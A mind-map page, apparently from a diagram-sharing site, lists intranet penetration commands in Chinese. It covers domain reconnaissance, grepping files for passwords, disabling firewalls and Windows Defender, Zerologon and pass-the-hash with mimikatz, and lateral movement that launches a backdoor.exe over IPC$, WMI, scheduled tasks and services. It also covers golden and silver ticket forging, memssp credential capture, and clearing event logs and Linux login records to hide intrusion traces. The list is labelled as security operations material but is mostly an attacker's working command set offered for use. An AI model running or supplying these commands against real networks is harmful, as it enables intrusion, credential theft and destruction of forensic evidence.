登錄
登入

心智圖資源庫內部網路滲透常用指令

內部網路滲透常用指令

網路安全運維緊急處置大全，包含資訊收集、文件查找、遠程、計劃任務、連接埠轉送、後門、工具、資訊取得、痕跡清理等。

編輯於2024-03-22 14:57:47

Deu-Martina

最近的作品檢視更多>>

Hundert Jahre Einsamkeit Charakter-Beziehungsdiagramm
Einhundert Jahre Einsamkeit ist das Meisterwerk von Gabriel Garcia Marquez. Die Lektüre dieses Buches beginnt mit der Klärung der Beziehungen zwischen den Figuren. Im Mittelpunkt steht die Familie Buendía, deren Wohlstand und Niedergang, interne Beziehungen und politische Kämpfe, Selbstvermischung und Wiedergeburt im Laufe von hundert Jahren erzählt werden.
Hundert Jahre Einsamkeit Charakter-Beziehungsdiagramm
Einhundert Jahre Einsamkeit ist das Meisterwerk von Gabriel Garcia Marquez. Die Lektüre dieses Buches beginnt mit der Klärung der Beziehungen zwischen den Figuren. Im Mittelpunkt steht die Familie Buendía, deren Wohlstand und Niedergang, interne Beziehungen und politische Kämpfe, Selbstvermischung und Wiedergeburt im Laufe von hundert Jahren erzählt werden.
Projektmanagement-Prozess-Vorlage
Projektmanagement ist der Prozess der Anwendung von Fachwissen, Fähigkeiten, Werkzeugen und Methoden auf die Projektaktivitäten, so dass das Projekt die festgelegten Anforderungen und Erwartungen im Rahmen der begrenzten Ressourcen erreichen oder übertreffen kann. Dieses Diagramm bietet einen umfassenden Überblick über die 8 Komponenten des Projektmanagementprozesses und kann als generische Vorlage verwendet werden.

內部網路滲透常用指令

Deu-Martina

最近的作品檢視更多>>

推薦給您
大綱

區域網路和城域網
- 8
WSUJfrxa
網路工程師 - 網路安全
- 14
- 1
슈퍼직장인
行動應用安全需求分析與安全保護工程
- 11
- 1
WSb6eYgD

內部網路滲透常用指令

資訊收集

net指令

net time /domain net group "domain admins" /domain net group "domain controllers" /domain net user administrator /domain nltest /domain_trusts 取得域信任關係 nltest /dclist: net share net view \\domainip net view /domain 查看網域/工作組列表 net view /domain:secwing 查看secwing網域中電腦列表 net config Workstation 查詢機器屬於哪個網域 netstat -ano |findstr net accouts 查看本機密碼策略

set 檢視環境變數

nbtstat -A ip netbiso查詢 whoami /all qwinsta //查看登入狀況 query user //查看管理員最近登陸時間 nltest /domain_trusts //取得網域信任資訊 taskkill /f /im tasklist /svc 查看進程 tasklist /S ip /U domain\username /P /V //查看遠端電腦進程列 tracert IP //路由追蹤 route print //列印路由表 arp -a //列出本網段內所有活躍的IP位址 arp -s （ip MAC）//綁定mac與ip位址 arp -d （ip MAC） //解綁mac與ip位址 reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /ve 取得最近mstsc登入的記錄 setspn -Q \*/\* SPN列表

文件查找

findstr找出包含密碼的文件

findstr /si password *.txt findstr /si password *.xml findstr /si password *.ini

dir查找文件位置

dir /b /s unattend.xml dir /b /s web.config dir /b /s sysprep.inf

遠端

關閉防火牆

netsh firewall set opmode mode=disable netsh advfirewall set allprofiles state off

關閉windefend

net stop windefend

防火牆恢復預設

netsh firewall reset

開啟3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

CVE-2020-1472

privilege::debug sekurlsa::logonpasswords lsadump::zerologon /target:ip /account:ADC1$ lsadump::zerologon /target:ip /account:ADC1$ /exploit lsadump::dcsync /domain:DC2.com /dc:DC2 /user:administrator /authuser:DC2$ /authdomain:DC2 /authpassword:"" /authntlm sekurlsa::pth /user:administrator /domain:. /rc5:161cff084477fe596a5db81874498a24

IPC

net use \\ip\ipc$ password /user:domain\user net use [url=file://\\IP\ipc$]\\IP\ipc$[/url] password /user:username@domain copy putty.exe \\192.168.0.100\admin$ net time \\192.168.0.100 at \\192.168.0.100 19:45 putty.exe net use Z: \\192.168.0.100\c$ 將靶機c碟映射到本地 dir \\192.168.17.138\c$ copy test.exe \\192.168.17.138\c$ net use * \\192.168.0.100 /del net use * /del /y net use * /del net use 查看會話 net session

WMI

wmic qfe get hotfixid //查看已安裝過補丁，這個很實用 wmic qfe list full /format:htable > hotfixes.htm //詳細的補丁安裝 wmic qfe //查詢補丁資訊以及微軟提供的下載位址 ping hostname(主機名稱） //顯示該機器名稱的IP wmic share get name,path //查看SMB指向的路徑 wmic nteventlog get path,filename,writeable //查詢系統日誌檔案儲存位置 wmic service list brief //查看進程服務 wmic process list brief //查看進程 wmic startup list brief //查看啟動程式訊息 wmic product list brief //查看安裝程式和版本資訊（漏洞利用線索） wmic startup list full //辨識開機啟動的程式 wmic process where(description="mysqld.exe") >> mysql.log //取得軟體安裝路徑 wmic /node:ip /user: /p pwd process call create c:\backdoor.exe wmic /node /user: /password: process wher e name="cmd.exe" cll terminate wmic /node:10.10.10.11 /user:administrator /password:1qaz@WSX process call create "cmd.exe /c ipconfig>c:\result.txt" WMIcmd.exe -h 192.168.1.152 -d hostname -u pt007 -p admin123 -c "ipconfig" wmic /node /user /password process where name="cmd.exe" get CommandLine

計劃任務

AT指令（win server2012已遺棄）

建立net use 連接 net use \\192.168.1.100\c$ 1qaz@WSX /user domain\user 複製bat檔案到遠端計算機 copy exec.bat \\192.168.1.100\c$\windows\debug\exec.bat 查看遠端電腦時間 net time \\192.168.1.100 新遠端規劃任務 at \\192.168.1.100 21.52 c:\windows\temp\exec.bat 查看遠端排程任務列表 at \\192.168.1.100

Schtasks

創建任務 schtasks /create /s ip /u administrator /password /ru "system" /tn adduser(名稱) /sc DAILY(時間) /tr c:\windows\debug\add.bat /f 運行任務 schtasks /run /s ip /u administrator /p password /tn adduser /i schtasks /run /tn update /$ 10.10.10.137 /u test \administrator /p 1qaz@WSX 刪除任務 schtasks /delete /s ip /u administrator /p password /tn adduser /f

SC服務控制指令，微軟內建,配合檔案分享，遠端建立服務

建立ipc連線執行SC net use \\192.168.17.138\c$ "admin123" /user:pt007 net use dir \\192.168.17.138\c$ copy test.exe \\192.168.17.138\c$ 創建服務 sc \\remote_ip create services_name binpath= c:\backdoor.exe sc \\10.10.10.10 create update binpath= c:\programdata\a.bat 啟動服務 sc \\remote_ip start services_name sc \\10.10.10.10 start update 停止服務 sc \\remote_ip stop serviece_name sc \\10.10.10.10 stop update 刪除服務 sc \\remote_ip delete service_name sc \\10.10.10.10 delete update

連接埠轉送

Netsh連接埠轉送

netsh firewall show config //查看防火牆策略 netsh firewall show state //查看防火牆策略開啟連接埠轉送 netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport 打開防火牆 netsh advfirewall firewall add rule name="firewallname" protocol=TCP dir=in localip=ip localport=port action=allow 顯示所有轉送規則 netsh interface portproxy show all 刪除轉發 netsh interface portproxy delete v4tov4 listenport=port listenaddress=ip 重置 netsh interface portproxy reset

SSH轉發

1.ssh正向連接埠轉發 ssh -L [<local host>:] <local port>:<remote host>:<remote port><ssh hostname> 2.ssh反向連接埠轉發 ssh -R [<local host>:]<local port>:<remote host>:<remote port><ssh hostname> 3.ssh socks代理 ssh -D [<local host>:] <local port><ssh hostname>

後門

黃金票據

黃金票據的條件要求： 1.域名稱 2.域的SID值 whoami /user 3.域的Krbtgt帳戶NTLM密碼哈希 4.偽造用戶名 sekurlsa::pth /user:administrator /domain:"GOD.org" /ntlm:61465a991b168727b65b3644aab823cd 登陸用戶網域位址 ntlm加密值這裡會彈出一個CMD框我們先用看看自己是否有權限 dir \\OWA.GOD.org\c$ 【查看域控C盤】 dir \\\\DC.zkaq.cn\c$ lsadump::dcsync /user:krbtgt /domain: 取得krbtgt的密碼 [mimikatz 會模擬網域控，向目標網域控請求帳號密碼資訊] 提取裡面的sid和hashNTLM kerberos::golden /admin:administrator /domain:GOD.org /sid:S-1-5-21-2952760202-1353902439-2381784089 /krbtgt:58e91a5358d [製作票據] kerberos::ptt administrator.kiribi [載入票據] 直接注入黃金票據 kerveros::golden /admin:ADMIINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:domainsid /krbtgt:hash /ptt kerberos::purge 清空票據 privilege::debug 等待管理員登入以取得密碼 mimikatz # privilege::debug Privilege '20' OK mimikatz # misc::memssp Injected =) mimikatz # exit

白銀票據

查看目前使用者sid whoami /user 取得目標計算機哈希 sekurlsa::logonpasswords 1472漏洞產生白銀票據 kerberos::golden /sid:domainsid /domain:test.local /ptt /id:偽造使用者ID /target:mdc.test.local /service:cifs /rc:目標電腦hash /user:偽造使用者名稱

工具

dsquery

dsquery.exe user -limit 0#查詢使用者物件資訊 dsquery.exe group -limit 0 #查詢群組物件信息 dsquery.exe ou -limit 0#查詢OU物件信息 dsquery user domainroot -limit 65535 && net user /domain //列出該網域內所有使用者名稱 dsquery server -domain supre.com | dsget server -dnsname -site //搜尋網域內所有網域控制站並顯示他們的DNS主機名稱和網站名稱 dsquery contact //尋找目錄中的聯絡人 dsquery subnet //列出該域內網段劃分 dsquery group && net group /domain //列出該網域內分組 dsquery ou //列出該域內組織單位 dsquery server && net time /domain //列出該網域內網域控制器 dsquery site -o rdn //搜尋網域中所有網站名稱 dsquery group dc=GOD,dc=org |more 搜尋在dc=god，dc=org網域中的所有群組 dsquery.exe computer #找出目標中的計算機 dsquery.exe site #找出目錄中的組織單位 dsquery.exe server #找出目錄中的AD DC/LDS 實例

ADfind

AdFind -sc dclist #列出網域控制站名稱 AdFind -sc computers_active #查詢目前網域中線上的計算機 AdFind -sc computers_active name operatingSystem #查詢目前網域中線上的電腦(只顯示名稱和作業系統) AdFind.exe -sc computers_active name dnshostname #查詢網域中活動的主機,輸出主機名稱和網域名稱 AdFind -f "objectcategory=computer" #查詢目前網域中所有計算機 AdFind -f "objectcategory=computer" name operatingSystem #查詢目前網域中所有電腦(只顯示名稱和作業系統) AdFind -users name #查詢網域內所有用戶 AdFind -sc gpodmp #查詢所有GPO AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:* #查詢網域內所有使用者詳細信息 AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:test #查詢網域內特定使用者詳細信息 AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:test mail #查詢網域內特定使用者特定資訊（mail） AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:* -dn #查詢網域內所有使用者dn信息 AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc u:* -c #查詢網域內使用者數量 AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc g:* #查詢域內所有群組詳細信息 AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc g:*Admin #查詢網域內群組名稱包含 Admin 的所有群組詳細信息 AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc o:* #查詢網域內所有OU詳細信息 AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc c:* #查詢域內所有電腦詳細資訊 AdFind -h 10.10.10.10 -u GOD\administrator -up 1qaz@WSX -sc s:* #查詢域內所有站點詳細信息

psexec paexec

psexec.exe -accepteula \\10.10.10.137 -u test\administrator -p 1qaz@WSX -i cmd.exe psexec.exe -accepteula -i -s -d cmd paexec.exe \\ip -u domain\user -p pwd cmd.exe -noname net use \\ip pwd /u:domain\user paexec.exe \\ip cmd.exe netsh winhttp sh proxy 查看代理

winrm連接埠複用入網

winrm quickconfig -q winrm s winrm/config/Client @{TrustedHosts="*"} 新增80埠監聽 winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"} 修改5985到80 winrm set winrm/config/Listener?Address=* Transprot=HTTP @{port=80} 修改WinRM埠為web埠 winrs -r:http://xx -u:DC20\administratror -p:1qaz@WSX cmd

資訊獲取

powerview

載入 Imoport-Module .\PowerView.ps1 #執行查詢 Get-DomainGroup #查詢群組的詳細信息 Get-DomainOU #查詢OU的詳細信息 Get-DomainUser #查詢使用者的詳細信息

psloggendon.exe

psloggedon.exe 使用者名 -l只顯示本地登陸用戶而不顯示其它的網路登陸用戶 -x不顯示登陸時間顯示遠端機器現在登陸的使用者可以打： psloggedon \\遠端機器ip 首次使用加 -accepteula 不顯示版權信息

netsess.exe

netsess.exe \\PRIMARY

PVEFindADUser.exe

PVEFindADUser.exe -current

wevtutil

wevtutil epl Security C:\log.evtx /q:"*[EventData[Data[@Name='LogonType']='3'] and System[(EventID=4624) and TimeCreated[timediff(@SystemTime) <= 259200000 ]]]" /r:遠端電腦IP /u:使用者名稱/p:密碼 #epl 匯出日誌 #Security 表示安全日誌 #C:\log.evtx 代表匯出日誌的位置，遠端匯出的話會匯出到遠端電腦上。 #/q：代表日誌查詢語句 #System[(EventID=4624) 代表時間ID為4624，即使用者登入成功的日誌 #EventData[Data[@Name='LogonType']='3']代表登入類型為網路登入 #TimeCreated[timediff(@System Time) <= 259200000] 代表只匯出最近一個月的日誌，259200000的單位為毫秒，可依實際需求自行改變數字大小。 #本地匯出的話不需要指定/r選項 #wevtutil的更多用法請參閱其說明文檔，可用於刪除windows日誌。

logparser

LogParser.exe -i:EVT -o csv "SELECT distinct TO_UPPERCASE(EXTRACT_TOKEN(Strings,5,'|')) as USERNAME,TO_UPPERCASE(EXTRACT_TOKEN(Strings,18,'|')) as SOURCE_IP FROM C:\*. evtx" > C:\log.csv # -i:EVT 代表日誌輸入格式為evtx # -o csv 代表輸出格式為csv # 雙引號裡的內容為查詢語句 # distinct 代表將結果去重 # TO_UPPERCASE(EXTRACT_TOKEN(Strings,5,'|')) as USERNAME 從登入日誌解析出日誌名 # USERNAME,TO_UPPERCASE(EXTRACT_TOKEN(Strings,18,'|')) 從登入日誌中解析出登入來源 # *.evtx可以同時處理多個日誌文件 # 可以透過以下命令查看登入日誌的詳細信息 LogParser.exe -i:EVT -o:DATAGRID "select * from *.evtx"

痕跡清理

wevtutil

wevtutil el 列出系統中所有日誌的名稱 wevtutil cl system 清理系統日誌 wevtutil cl application 清理應用程式日誌 wevtutil cl security 清理安全性日誌 for /f "delims=" %j in('wevtutil.exe el') do @wevtutil.exe cl "%j" c:\windows\system32\winevt\logs\

windows defender

"C:\PROGRA~1\WINDOW~1\mpcmdrun.exe" -Restore -ListAll powershell -Command Add-MpPreference -ExclusionPath "C:\tmp" powershell -Command Add-MpPreference -ExclusionExtension".java" powershell -Command Add-MpPreference -ExclusionProcess"*.exe" powershell -Command Get-MpPreference

ssh 登入訊息

/var/log/btmp 記錄所有登入失敗訊息，使用 lastb 指令查看 /var/log/lastlog 記錄系統中所有使用者最後一次登入時間日誌，使用 lastlog 指令查看 /var/log/wtmp 記錄所有使用者的登錄，登出訊息，使用last指令查看 /var/log/utmp 記錄目前已登入的使用者訊息，使用w,who,users等指令查看 /var/log/secure 記錄與安全相關的日誌訊息 /var/log/message 記錄系統啟動後的資訊和錯誤日誌登入ssh時顯示的上次登入記錄 last login 時間 fromn ip 記錄在檔案 /var/log/lastlog ~/.ssh/known_hosts 可以使用sed替換 sed -i 's/自己ip/原ip' /var/log/lastlog sed -i '/當天日期/'d filename 隱身登入系統，不會被 w,who,last 等指令偵測到 ssh -T root@192.168.01 /bin/bash -i